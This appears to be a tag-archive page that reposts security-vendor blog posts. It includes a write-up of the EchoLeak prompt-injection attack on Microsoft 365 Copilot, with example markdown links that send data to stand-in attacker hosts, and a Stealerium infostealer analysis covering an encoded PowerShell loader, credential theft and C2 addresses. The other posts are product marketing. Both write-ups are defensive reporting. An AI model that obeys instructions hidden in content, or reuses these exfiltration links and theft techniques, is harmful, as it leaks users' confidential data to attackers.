لرن سرا

برچسب: Threat

  • The Silent AI Threat Hacking Microsoft 365 Copilot

    The Silent AI Threat Hacking Microsoft 365 Copilot


    Introduction:

    What if your Al assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

    From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click Let’s understand  below in detail!

    1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI assisted processing. To conceal the injected instruction, the attacker uses various stealth techniques, such as: HTML comments.
    2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

    1. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

    1. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

    1. Input Sanitization and Validation

    All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style=”display:none;”>, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.

    1. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

    1. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

    1. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.

    1. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee



    Source link

  • Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy

    Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy


    In the ever-evolving landscape of cyber threats, organizations are no longer asking if they’ll be targeted but when. Traditional cybersecurity measures, such as firewalls, antivirus software, and access control, remain essential. But they’re often reactive, responding only after a threat has emerged. In contrast, threat intelligence enables organizations to get ahead of the curve by proactively identifying and preparing for risks before they strike.

    What is Threat Intelligence?

    At its core, threat intelligence is the process of gathering, analyzing, and applying information about existing and potential attacks. This includes data on threat actors, tactics and techniques, malware variants, phishing infrastructure, and known vulnerabilities.

    The value of threat intelligence lies not just in raw data, but in its context—how relevant it is to your environment, and how quickly you can act on it.

    Why Organizations Need Threat Intelligence

    1. Cyber Threats Are Evolving Rapidly

    New ransomware variants, phishing techniques, and zero-day vulnerabilities emerge daily. Threat intelligence helps organizations stay informed about these developments in real time, allowing them to adjust their defenses accordingly.

    1. Contextual Awareness Improves Response

    When a security event occurs, knowing whether it’s a one-off anomaly or part of a broader attack campaign is crucial. Threat intelligence provides this clarity, helping teams prioritize incidents that pose real risk over false alarms.

    1. It Powers Proactive Defense

    With actionable intelligence, organizations can proactively patch vulnerabilities, block malicious domains, and tighten controls on specific threat vectors—preventing breaches before they occur.

    1. Supports Compliance and Risk Management

    Many data protection regulations require businesses to demonstrate risk-based security practices. Threat intelligence can support compliance with frameworks like ISO 27001, GDPR, and India’s DPDP Act by providing documented risk assessments and preventive actions.

    1. Essential for Incident Detection and Response

    Modern SIEMs, SOAR platforms, and XDR solutions rely heavily on enriched threat feeds to detect threats early and respond faster. Without real-time intelligence, these systems are less effective and may overlook critical indicators of compromise.

    Types of Threat Intelligence

    • Strategic Intelligence: High-level trends and risks to inform business decisions.
    • Tactical Intelligence: Insights into attacker tools, techniques, and procedures (TTPs).
    • Operational Intelligence: Real-time data on active threats, attack infrastructure, and malware campaigns.
    • Technical Intelligence: Specific IOCs (indicators of compromise) like IP addresses, hashes, or malicious URLs.

    Each type plays a unique role in creating a layered defense posture.

    Challenges in Implementing Threat Intelligence

    Despite its benefits, threat intelligence can be overwhelming. The sheer volume of data, lack of context, and integration issues often dilute its impact. To be effective, organizations need:

    • Curated, relevant intelligence feeds
    • Automated ingestion into security tools
    • Clear mapping to business assets and risks
    • Skilled analysts to interpret and act on the data

     The Way Forward: Intelligence-Led Security

    Security teams must shift from passive monitoring to intelligence-led security operations. This means treating threat intelligence as a core input for every security decision, such as prioritizing vulnerabilities, hardening cloud environments, or responding to an incident.

    In a world where attackers collaborate, automate, and innovate, defenders need every edge. Threat intelligence provides that edge.

    Ready to Build an Intelligence-Driven Defense?

    Seqrite Threat Intelligence helps enterprises gain real-time visibility into global and India—specific emerging threats. Backed by over 10 million endpoint signals and advanced malware analysis, it’s designed to supercharge your SOC, SIEM, or XDR. Explore Seqrite Threat Intelligence to strengthen your cybersecurity strategy.



    Source link

  • The Role of ZTNA in Insider Threat Mitigation

    The Role of ZTNA in Insider Threat Mitigation


    In today’s fast-evolving threat landscape, enterprises often focus heavily on external cyberattacks, overlooking one of the most potent and damaging risks: insider threats. Whether it’s a malicious employee, a careless contractor, or a compromised user account, insider threats strike from within the perimeter, making them harder to detect, contain, and mitigate.

    As organizations become more hybrid, decentralized, and cloud-driven, moving away from implicit trust is more urgent than ever. Zero Trust Network Access (ZTNA) is emerging as a critical solution, silently transforming how businesses do insider threat mitigation.

    Understanding the Insider Threat Landscape

    Insider threats are not always malicious. They can stem from:

    • Disgruntled or rogue employees intentionally leaking data
    • Well-meaning staff misconfiguring systems or falling for phishing emails
    • Contractors or third-party vendors with excessive access
    • Compromised user credentials obtained via social engineering

    According to multiple cybersecurity studies, insider incidents now account for over 30% of all breaches, and their average cost rises yearly.

    The real challenge? Traditional security models operate on implicit trust. Once inside the network, users often have wide, unchecked access, which creates fertile ground for lateral movement, privilege abuse, and data exfiltration.

    ZTNA in Action: Redefining Trust, Access, and Visibility

    Zero Trust Network Access challenges the outdated notion of “trust but verify.” Instead, it enforces “never trust, always verify”—even for users already inside the network.

    ZTNA provides access based on identity, device posture, role, and context, ensuring that every access request is continuously validated. This approach is a game-changer for insider threat mitigation.

    1. Granular Access Control

    ZTNA enforces least privilege access, meaning users only get access to the specific applications or data they need—nothing more. Even if an insider intends to exfiltrate data, their reach is limited.

    For example, a finance team member can access their accounting software, but cannot see HR or R&D files, no matter how hard they try.

    1. Micro-Segmentation for Blast Radius Reduction

    ZTNA divides the network into isolated micro-segments. This restricts lateral movement, so even if an insider compromises one segment, they cannot hop across systems undetected.

    This segmentation acts like watertight compartments in a ship, containing the damage and preventing full-scale breaches.

    1. Device and Risk Posture Awareness

    ZTNA solutions assess device health before granting access. Access can be denied or limited if an employee logs in from an outdated or jailbroken device. This becomes crucial when insider risks stem from compromised endpoints.

    1. Continuous Monitoring and Behavioral Analytics

    ZTNA enables real-time visibility into who accessed what, from where, and for how long. Any deviation from expected behavior can trigger alerts or require re-authentication. For instance:

    • A user downloading an unusually high volume of files
    • Repeated access attempts outside business hours
    • Use of shadow IT apps or unauthorized tools

    With continuous risk scoring and adaptive access, suspicious insider behavior can be curtailed before damage is done.

    Real-World Relevance: Insider Threats in Indian Enterprises

    As Indian organizations ramp up their digital transformation and cloud adoption, they face new risks tied to employee churn, contractor access, and remote work culture. In addition to the growing compliance pressure from laws like the Digital Personal Data Protection (DPDP) Act, it has become clear that relying on static access controls is no longer an option.

    ZTNA’s dynamic, context-aware model perfectly fits this reality, offering a more resilient and regulation-ready access framework.

    How Seqrite ZTNA Helps with Insider Threat Mitigation

    Seqrite ZTNA is built to offer secure, identity-based access for modern Indian enterprises. It goes beyond authentication to deliver:

    • Role-based, micro-segmented access to specific apps and data
    • Granular control policies based on risk level, device posture, and location
    • Centralized visibility and detailed audit logs for every user action
    • Seamless experience for users, without the complexity of traditional solutions

    Whether you’re securing remote teams, contractors, or sensitive internal workflows, Seqrite ZTNA gives you the tools to limit, monitor, and respond to insider threats—without slowing down productivity.

    Final Thoughts

    Insider threats aren’t hypothetical—they’re already inside your network. And as organizations become more distributed, the threat surface only widens. Traditional access models offer little defense for insider threat mitigation.

    ZTNA isn’t just about external threats; it’s a silent guardian against internal risks. Enforcing continuous validation, granular access, and real-time visibility transforms your weakest points into strongholds.



    Source link

  • India Cyber Threat Report Insights for Healthcare Industry

    India Cyber Threat Report Insights for Healthcare Industry


    In 2024, one industry stood out in the India Cyber Threat Report—not for its technological advancements but for its vulnerability: healthcare. According to India Cyber Threat Report 2025, the healthcare sector accounted for 21.82% of all cyberattacks, making it the most targeted industry in India.

    But why is healthcare such a lucrative target for cybercriminals?

    The Perfect Storm of Opportunity

    Healthcare organizations are in a uniquely precarious position. They house vast amounts of sensitive personal and medical data, operate mission-critical systems, and often lack mature cybersecurity infrastructure. In India, the rapid digitization of healthcare — from hospital management systems to telemedicine — has outpaced the sector’s ability to secure these new digital touchpoints.

    This creates a perfect storm: high-value data, low resilience, and high urgency. Threat actors know that healthcare providers are more likely to pay ransoms quickly to restore operations, especially when patient care is on the line.

    How Cybercriminals are Attacking

    The India Cyber Threat Report highlights a mix of attack vectors used against healthcare organizations:

    • Ransomware: Threat groups such as LockBit 3.0 and RansomHub deploy advanced ransomware strains that encrypt data and disrupt services. These strains are often delivered through phishing campaigns or unpatched vulnerabilities.
    • Trojans and Infectious Malware: Malware masquerading as legitimate software is a standard tool for gaining backdoor access to healthcare networks.
    • Social Engineering and Phishing: Fake communications from supposed government health departments or insurance providers lure healthcare staff into compromising systems.

    What Needs to Change

    The key takeaway is clear: India’s healthcare organizations need to treat cybersecurity as a core operational function, not an IT side task. Here’s how they can begin to strengthen their cyber posture:

    1. Invest in Behavior-Based Threat Detection: Traditional signature-based antivirus tools are insufficient. As seen in the rise from 12.5% to 14.5% of all malware detections, behavior-based detection is becoming critical to identifying unknown or evolving threats.
    2. Harden Endpoint Security: With 8.44 million endpoints analyzed in the report, it’s evident that endpoint defense is a frontline priority. Solutions like Seqrite Endpoint Security offer real-time protection, ransomware rollback, and web filtering tailored for sensitive environments like hospitals.
    3. Educate and Train Staff: Many successful attacks begin with a simple phishing email. Healthcare workers need regular training on identifying suspicious communications and maintaining cyber hygiene.
    4. Backup and Response Plans: Ensure regular, encrypted backups of critical systems and have an incident response plan ready to reduce downtime and mitigate damage during an attack.

    Looking Ahead

    The India Cyber Threat Report 2025 is a wake-up call. As threat actors grow more sophisticated — using generative AI for deepfake scams and exploiting cloud misconfigurations — the time for reactive cybersecurity is over.

    At Seqrite, we are committed to helping Indian enterprises build proactive, resilient, and adaptive security frameworks, especially in vital sectors like healthcare. Solutions like our Seqrite Threat Intel platform and Malware Analysis Platform (SMAP) are built to give defenders the needed edge.

    Cyber safety is not just a technical concern — it’s a human one. Let’s secure healthcare, one system at a time.

    Click to read the full India Cyber Threat Report 2025



    Source link

  • Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer

    Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer


    Introduction

    A security researcher from Seqrite Labs has uncovered a malicious campaign targeting U.S. citizens as Tax Day approaches on April 15. Seqrite Labs has identified multiple phishing attacks leveraging tax-related themes as a vector for social engineering, aiming to exfiltrate user credentials and deploy malware. These campaigns predominantly utilize redirection techniques, such as phishing emails, and exploit malicious LNK files to further their objectives.

    Each year, cybercriminals exploit the tax season as an opportunity to deploy various social engineering tactics to compromise sensitive personal and financial data. These adversaries craft highly deceptive campaigns designed to trick taxpayers into divulging confidential information, making fraudulent to counterfeit services, or inadvertently installing malicious payloads on their devices, thereby exposing them to identity theft and financial loss.

    Infection Chain:

    Fig 1: Infection chain

    Initial analysis about campaign:

    While tax-season phishing, attacks pose a risk to a broad spectrum of individuals, our analysis indicates that certain demographics are disproportionately vulnerable. Specifically, high-risk targets include individuals with limited knowledge of government tax processes, such as green card holders, small business owners, and new taxpayers.

    Our findings reveal that threat actors are leveraging a sophisticated phishing technique in which they deliver files via email with deceptive extensions. One such example is a file named “104842599782-4.pdf.lnk,” which utilizes a malicious LNK extension. This tactic exploits user trust by masquerading as a legiti payments mate document, ultimately leading to the execution of malicious payloads upon interaction.

    Decoy Document:

    Threat actors are disseminating a transcript related to tax sessions, targeting individuals through email by sharing it as a malicious attachment. These cybercriminals are leveraging this document as a vector to deliver harmful payloads, thereby compromising the security of the recipients.

     

    Fig 2: Decoy Document

    Technical Analysis:

    We have retrieved the LNK file, identified as “04842599782-4.pdf.lnk,” which was utilized in the attack. This LNK file embeds a Base64-encoded payload within its structure.

    Fig 3: Inside LNK File

    Upon decoding the string, we extracted a PowerShell command line that itself contains another Base64-encoded payload embedded within it.

    Fig 4: Encoded PowerShell Command Line

     

    Subsequently, upon decoding the nested Base64 string, we uncovered the final PowerShell command line embedded within the payload.

    Fig 5: Decoded Command Line

    The extracted PowerShell command line initiated the download of rev_pf2_yas.txt, which itself is a PowerShell script (Payload.ps1) containing yet another Base64-encoded payload embedded within it.

    Fig 6: 2nd PowerShell command with Base64 Encoded

    We have decoded the above Base64 encoded command line and get below final executable.

    Fig 7: Decoded PowerShell Command

    According to the PowerShell command line, the script Payload.ps1 (or rev_pf2_yas.txt) initiated the download of an additional file, revolaomt.rar, from the Command and Control (C2) server. This archive contained a malicious executable, named either Setup.exe or revolaomt.exe.

    Detail analysis of Setup.exe / revolaomt.exe:

    Fig 8: Detect it Easy

    Upon detailed examination of the Setup.exe binary, it was identified as a PyInstaller-packaged Python executable. Subsequent extraction and decompilation revealed embedded Python bytecode artifacts, including DCTYKS.pyc and additional Python module components.

    Fig 9: PyInstaller-packaged Python executable
    Fig 10: In side DCTYKS.pyc

    Upon analysis of the DCTYKS.pyc sample, it was determined that the file contains obfuscated or encrypted payload data, which is programmatically decrypted at runtime and subsequently executed, as illustrated in the figure above.

    Fig 11: Encoded DCTYKS.pyc with Base64

    Upon successful decryption of the script, it was observed that the sample embeds a Base64-encoded executable payload. The decrypted payload leverages process injection techniques to target mstsc.exe for execution. Further analysis of the second-stage payload revealed it to be a .NET-compiled binary.

    Analysis 2nd Payload (Stealerium malware):

    Fig 12: .NET Base Malware sample

    The second-stage payload is identified as a .NET-based malware sample. Upon inspection of its class structures, methods, and overall functionality, the sample exhibits strong behavioural and structural similarities to the Stealerium malware family, specifically aligning with version 1.0.35.

    Stealerium is an open-source information-stealing malware designed to exfiltrate sensitive data from web browsers, cryptocurrency wallets, and popular applications such as Discord, Steam, and Telegram. It performs extensive system reconnaissance by harvesting details including active processes, desktop screenshots, and available Wi-Fi network configurations. Additionally, the malware incorporates sophisticated anti-analysis mechanisms to identify execution within virtualized environments and detect the presence of debugging tools.

    Anti_Analysis

    Fig 13: Anti Analysis Techniques
    Fig 14: GitHub URLs
    Fig 15: Detecting Suspicious ENV

    This AntiAnalysis class is part of malware designed to detect sandbox, virtual machines, emulators, suspicious processes, services, usernames, and more. It checks system attributes against blacklists fetched from online sources (github). If any suspicious environment is detected, it logs the finding and may trigger self-destruction. This helps the malware avoid analysis in controlled or security research setups.

    Mutex Creation

    Fig 16: Mutex Creation

    This MutexControl class prevents multiple instances of the malware from running at the same time. It tries to create a system-wide mutex using a name from Config.Mutex (QT1bm11ocWPx). If the mutex already exists, it means another instance is running, so it exits the process. If an error occurs during this check, it logs the error and exits too.

    Fig 17: Configuration of StringsCrypt.DecryptConfig

    It configures necessary values by decrypting them with StringsCrypt.DecryptConfig. It handles the decryption of the server base URL and WebSocket address. If enabled, it also decodes cryptocurrency wallet addresses from Base64 and decrypts them using AES-256 encryption.

    “hxxp://91.211.249.142:7816”

    Radom Directory Creation

    Fig 18: Random Directory Creation

    The InitWorkDir() method generates a random subdirectory under %LOCALAPPDATA%, creates it if it doesn’t exist, and hides it for stealth purposes. This is likely used for storing data or maintaining persistence without detection.

    \AppData\Local\e9d3e2dd2788c322ffd2c9defddf7728 random directory is created in hidden attribute.

    BoT Registration

    Fig 19: BOT Registration

    The RegisterBot method initiates an HTTP POST request to register a bot instance, utilizing a unique hash identifier and an authorization token for authentication. It serializes the registration payload, appends the necessary HTTP headers, and logs the server response or any encountered exceptions. The method returns a boolean value—true upon successful execution, and false if an exception is raised during the process.

    RequestUri: ‘http[:]//91[.]211[.]249[.]142:7816/api/bot/v1/register’

     

    Stealer Activity From Browser:

    Fig 20: Stealer activity from Browser

    It extracts browser-related data (passwords, cookies, credit cards, history, bookmarks, autofill) from a given user data profile path.

    FileZilla Credentials stealer activity

    Fig 21: FileZilla Credential Stealer activity

    The above code is part of a password-stealing component targeting FileZilla, an FTP client.

    Gaming Platform Data Extraction Modules

    Fig 22: Gaming platform data extraction

    This component under bt.Stub.Target.Gaming is designed to collect data from the following platforms:

    • BattleNet
    • Minecraft
    • Steam
    • Uplay

    Each class likely implements routines to extract user data, game configurations, or sensitive files for exfiltration.

    Fig 23: Checks for a Minecraft installation

    It checks for a Minecraft installation and creates a save directory to exfiltrate various data like mods, files, versions, logs, and screenshots. It conditionally captures logs and screenshots based on the Config.GrabberModule setting.

    Messenger Data Stealer Modules

    Itargets various communication platforms to extract user data or credentials from:

    • Discord
    • Element
    • ICQ
    • Outlook
    • Pidgin
    • Signal
    • Skype
    • Telegram
    • Tox

    Below is one example of Outlook Credentials Harvesting

    It targets specific registry keys associated with Outlook profiles to extract sensitive information like email addresses, server names, usernames, and passwords. It gathers data for multiple mail clients (SMTP, POP3, IMAP) and writes the collected information to a file (Outlook.txt).

    Fig 24: Messenger Data Extraction

     

    Webcam Screenshot Capture

    Attempts to take a screenshot using a connected webcam, saving the image as a JPEG file. If only one camera is connected, it triggers a series of messages to capture the webcam image, which is then saved to the specified path (camera.jpg or a timestamped filename). The method is controlled by a configuration setting (Config.WebcamScreenshot).

     

    Fig 25: Webcam Screen shot captures

     

    Wi-Fi Password Retrieval

     

    It retrieves the Wi-Fi password for a given network profile by running the command netsh wlan show profile and extracting the password from the output. The command uses findstr Key to filter the password, which is then split and trimmed to get the value

     

    Fig 26: WI-FI Password Retrieval

     

    VPN Data Extraction

    It targets various VPN applications to exfiltrate sensitive information such as login credentials:

    • NordVpn
    • OpenVpn
    • ProtonVpn

    For example, it  extracts and saves NordVPN credentials from the user.config file found in NordVPN installation directories. It looks for “Username” and “Password” settings, decodes them, and writes them to a file (accounts.txt) in the specified savePath.

     

    Fig 27: VPN Data Extraction

     

    Porn Detection & Screenshot Capture

    Fig 28: Porn Detection & Snapshot Captures.

    It detects adult content by checking if the active window’s title contains specific keywords related to NSFW content (configured in Config.PornServices). If such content is detected, it triggers a screenshot capture.

    Conclusion:

    Based on our recent proactive threat analysis, we’ve identified that cybercriminals are actively targeting U.S. citizens around the tax filing period scheduled for April 15. These threat actors are leveraging the occasion to deploy Stealerium malware, using deceptive tactics to trick users.

    Stealerium malware is designed to steal Personally Identifiable Information (PII) from infected devices and transmit it to attacker-controlled bots for further exploitation.

    To safeguard your data and devices, we strongly recommend using Seqrite Endpoint Security, which provides advanced protection against such evolving threats.

    Stay secure. Stay protected with Seqrite.

    TTPS

    Tactic Technique ID Name
    Initial Access T1566.001 Phishing: Spear phishing Attachment
    Execution T1059.001 Command and Scripting Interpreter: PowerShell
    Evasion T1140 Deobfuscate/Decode Files or Information
    T1027 Obfuscated Files or Information
    T1497 Virtualization/Sandbox Evasion
    T1497.001 System Checks
    Credential Access T1555.003 Credentials from Password Stores:  Credentials from Web Browsers

     
    T1539 Steal Web Session Cookie
    Discovery T1217 Browser Information Discovery
    T1016 System Network Configuration Discovery: Wi-Fi Discovery
    Collection T1113 Screen Capture
    Exfiltration T1567.004 Exfiltration Over Web Service:  Exfiltration Over Webhook

     

    Seqrite Protections:

    • HEUR:Trojan.Win32.PH
    • Trojan.49490.GC
    • trojan.49489.GC

    IoCs:

    File Name SHA-256
    Setup.exe/revolaomt.exe 6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
    104842599782-4.pdf.lnk 48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
    payload_1.ps1 / fgrsdt_rev_hx4_ln_x.txt 10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
    revolaomt.rar 31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
    104842599782-4.html Ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

     

    C2:

    • hxxp[:]//91[.]211[.]249[.]142:7816/
    • hxxp://91.211.249.142:7816″
    • hxxp[:]//185[.]237[.]165[.]230/

     

    Authors:

    Dixit Panchal
    Kartik Jivani
    Soumen Burma



    Source link